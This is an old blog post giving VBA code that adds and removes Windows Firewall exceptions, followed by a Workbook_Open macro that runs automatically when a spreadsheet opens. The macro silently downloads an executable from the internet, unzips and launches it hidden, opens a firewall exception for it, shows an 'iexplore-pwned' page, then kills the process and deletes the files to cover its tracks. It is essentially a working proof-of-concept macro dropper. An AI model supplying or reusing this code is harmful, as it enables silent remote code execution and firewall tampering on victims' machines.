Sunday, November 16, 2008

Modifying Windows Firewall Rules from VBA

You can also modify the Microsoft Windows firewall from within VBA using the HNetCfg.FwMgr object. Versions of these scripts are available on MSDN.
Function Add_App_To_Firewall(program_name, program_executable, program_scope)
 
   Const NET_FW_PROFILE_DOMAIN = 0
   Const NET_FW_PROFILE_STANDARD = 1

   Const NET_FW_SCOPE_ALL_NAME = "All subnets"
   Const NET_FW_SCOPE_LOCAL_SUBNET_NAME = "Local subnet only"
 
   Const NET_FW_IP_VERSION_ANY = 2
 
   ' Create the firewall manager object.
   Dim fwMgr
   Set fwMgr = CreateObject("HNetCfg.FwMgr")

   ' Get the current profile for the local firewall policy.
   Dim profile
   Set profile = fwMgr.LocalPolicy.CurrentProfile
 
   Dim app
   Set app = CreateObject("HNetCfg.FwAuthorizedApplication")

   app.ProcessImageFileName = program_executable
   app.Name = program_name
   app.Scope = program_scope
 
   app.IpVersion = NET_FW_IP_VERSION_ANY
   app.Enabled = True

   On Error Resume Next
   profile.AuthorizedApplications.Add app

End Function

Function Remove_App_From_Firewall(program_executable)

   On Error Resume Next

   ' Create the firewall manager object.
   Dim fwMgr
   Set fwMgr = CreateObject("HNetCfg.FwMgr")
 
   ' Get the current profile for the firewall
   Dim fwPolicy
   Set fwPolicy = fwMgr.LocalPolicy.CurrentProfile
 
   ' Get the Auth Applications object so we can modify
   Dim colApplications
   Set colApplications = fwPolicy.AuthorizedApplications
 
   colApplications.Remove program_executable

End Function

As an example, here's the commands that will download the Tiny Web Server from the internet, unzip it, add it to the allowed exceptions list for the Windows FW, create a quick .html file, start the server, run Internet Explorer pointed to this server, then kill the server, remove the firewall rule, and delete all of the files.

Sub Workbook_Open()
   'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
   'Obviously in a real world application you'd want to bring your own unzipper
   Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"
   Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
 
   Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2
   Add_App_To_Firewall "tiny-local", Environ("TEMP") & "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET
 
   Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT
 
   Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT
 
   ' "Sleep" for a couple of seconds to allow tiny.exe to load
   Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT
 
   Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT
 
   Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT
 
   Remove_App_From_Firewall Environ("TEMP") & "\tiny.exe"
 
   On Error Resume Next
   Kill Environ("TEMP") & "\tinyweb.zip"
   Kill Environ("TEMP") & "\SRC.zip"
   Kill Environ("TEMP") & "\LICENSE.txt"
   Kill Environ("TEMP") & "\File_id.diz"
   Kill Environ("TEMP") & "\Readme.txt"
   Kill Environ("TEMP") & "\Cgitest.zip"
   Kill Environ("TEMP") & "\index.html"
   Kill Environ("TEMP") & "\tiny.exe"

End Sub
Bloggerized by Nathan Keltner at 6:36 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)